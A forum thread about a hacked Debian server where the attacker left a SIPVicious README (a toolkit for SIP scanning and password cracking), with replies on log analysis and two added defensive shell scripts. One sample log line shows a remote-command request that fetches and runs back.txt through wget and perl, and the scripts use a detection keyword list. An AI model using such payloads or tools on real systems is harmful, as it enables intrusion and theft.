Server Hacked

Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

Code:

cat README
Welcome to SIPVicious security tools.
The 4 tools that you should be looking at are:
- svmap
- svwar
- svcrack
- svreport
The tools:
svmap - this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.
svwar - identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.
svcrack - a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.
svreport - able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.
svlearnfp - allows you to generate new fingerprints by simply running
the tool against a host. It will attempt to guess most values and allow
you to save the information to the local fingerprint db. Then you can
choose to upload it to the author so that it can be added to the database.
For usage help make use of -h or --help switch.
Also check out the wiki:
http://code.google.com/p/sipvicious/w/list
And if you're stuck you're welcome to contact the author.
Sandro Gauci
sandrogauc at gmail dot com

rkhunter isn't finding anything. The system is always up-to-date, WordPress is the newest version and only running on 1 site with suexec.

grep through your Apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
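The log triage suggested in the reply above, written out as shell functions. This is an added example, not code from anyone in this thread; the log lines are constructed samples in Apache combined format (the addresses, paths and plugin name are invented), not the poster's real logs. It goes slightly beyond the reply by also ranking source addresses and pulling everything logged in a given minute.

```shell
#!/bin/sh
# Added example: grep-based triage of an Apache access log for signs of a
# download-and-run script exploit, plus phpMyAdmin probes.
# The sample log below is constructed for this example (no real hosts).

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2010:13:57:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2010:13:57:02 +0000] "GET /pma/ HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2010:14:02:10 +0000] "GET /wp-content/plugins/foo/bar.php?cmd=wget%20http://example.invalid/back.txt HTTP/1.1" 200 41 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2010:14:02:11 +0000] "GET /wp-content/plugins/foo/bar.php?cmd=perl%20back.txt HTTP/1.1" 200 41 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Oct/2010:14:03:00 +0000] "GET /?x=curl HTTP/1.1" 200 12 "-" "curl/7.19"
EOF

# Keywords from the reply, plus chmod. -w matches whole words only, so
# "tar" does not fire on every request containing "start".
TOOL_WORDS='wget|curl|tar|exec|perl|chmod'

# Every log line mentioning one of the tools, in the request or the user agent.
suspicious_lines() {
    grep -Eiw "$TOOL_WORDS" "$1"
}

# Number of such lines.
suspicious_count() {
    grep -Eicw "$TOOL_WORDS" "$1"
}

# Requests for phpMyAdmin under its common install paths.
phpmyadmin_probe_count() {
    grep -Eic '/(phpmyadmin|pma|myadmin)/' "$1"
}

# Source addresses ranked by how many suspicious requests they sent.
top_sources() {
    suspicious_lines "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Everything logged during one minute (HH:MM), to read the context around
# the moment the files were pulled down.
requests_at_minute() {
    grep -F ":$2:" "$1"
}

# Stand-alone run against the sample.
suspicious_lines "$SAMPLE_LOG"
echo "suspicious requests: $(suspicious_count "$SAMPLE_LOG")"
echo "phpMyAdmin probes:   $(phpmyadmin_probe_count "$SAMPLE_LOG")"
top_sources "$SAMPLE_LOG"
```

On a Debian box the logs to point this at live under /var/log/apache2/ (access.log and its rotated copies, or one access log per vhost if suexec sites log separately). Keep in mind that a plain grep only sees the keywords as written; a request that URL-encodes them will slip past, so treat a clean result as a starting point rather than proof of nothing.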

As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not get root privileges yet. There have been a few vulnerabilities in phpmyadmin in the last months, and your log output shows that they searched for phpmyadmin, so it might be that they went in through phpmyadmin.

You wrote above that this is a Debian 4 system. I recommend that you update it to Debian 5. There is a how-to from Falko available here at HowtoForge that describes the Debian 4 to 5 update procedure. Before you update, remove phpmyadmin with:

apt-get remove --purge phpmyadmin

and reinstall it after the update with:

apt-get install phpmyadmin

You should also remove all these files in /tmp and then check your server in the next days for any anomalous behaviour or higher load. You can also check your server with a port scanner from another external system to see if any ports are open that you don't want to be open.
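A local counterpart to the external port scan suggested above: compare what the server itself reports as listening against a short allowlist, so that a listener started from /tmp stands out. This is an added example, not code from anyone in the thread; it reads input in the format of `ss -ltn` on Linux, and the listing below is constructed for the example (the 6667 listener is invented), not captured from the poster's machine.

```shell
#!/bin/sh
# Added example: flag listening sockets that are not on the allowlist and
# are reachable from outside (not bound to loopback).
# SAMPLE_SS is a constructed `ss -ltn` listing, not real output.

# Ports this server is expected to expose (assumption for the example).
ALLOWED_PORTS="22 80 443"

SAMPLE_SS=$(mktemp)
trap 'rm -f "$SAMPLE_SS"' EXIT
cat >"$SAMPLE_SS" <<'EOF'
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     0.0.0.0:80           0.0.0.0:*
LISTEN  0       128     127.0.0.1:3306       0.0.0.0:*
LISTEN  0       5       0.0.0.0:6667         0.0.0.0:*
EOF

# Print "port address" for every non-loopback listener whose port is not allowed.
unexpected_listeners() {
    awk -v allowed="$ALLOWED_PORTS" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "LISTEN" {
            addr = $4
            port = addr; sub(/.*:/, "", port)       # text after the last colon
            host = addr; sub(/:[^:]*$/, "", host)   # everything before it
            if (host ~ /^127\./ || host == "::1" || host == "[::1]") next  # loopback only
            if (!(port in ok)) print port, host
        }' "$1"
}

# Non-zero exit when anything unexpected is listening; handy from cron.
check_listeners() {
    if [ -n "$(unexpected_listeners "$1")" ]; then
        return 1
    fi
    return 0
}

# Stand-alone run against the sample listing.
if check_listeners "$SAMPLE_SS"; then
    echo "only expected ports are listening"
else
    echo "unexpected listeners:"
    unexpected_listeners "$SAMPLE_SS"
fi
```

On a live system replace the sample file with the real listing, e.g. `ss -ltn > /tmp/listen.txt` and pass that path; on an older Debian without ss, `netstat -ltn` gives similar data but with different columns, so the awk field numbers would need adjusting.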

Things have been OK since deleting all the files that were downloaded. I went ahead and did an upgrade from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

Code:

uname -r
2.6.18-128.1.1.el5.028stab062.3

Any downside to using an older kernel? The Debian version shows as lenny:

Code:

cat /etc/debian_version
5.0.6

I'm just a little nervous about trying to upgrade the kernel on a remote system.